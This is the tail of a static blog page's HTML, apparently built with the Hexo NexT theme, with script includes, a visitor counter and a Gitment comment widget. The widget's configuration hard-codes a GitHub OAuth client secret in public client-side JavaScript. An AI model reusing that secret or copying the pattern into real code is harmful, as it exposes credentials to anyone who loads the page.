    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
    
<!-- END LOCAL -->

    
      <style>
        a.gitment-editor-footer-tip { display: none; }
        .gitment-container.gitment-footer-container { display: none; }
      </style>
    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitmint({
            id: '1574240206000', 
            owner: 'lahonja',
            repo: 'lahonja-gitment',
            
            lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
            
            oauth: {
            
            
                client_secret: 'da95862b3f011a7014c03ca9390abcaaf69fd37b',
            
                client_id: 'be29a1cd496db3f72d7b'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  





  

  

  

  
  

  

  

  

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>
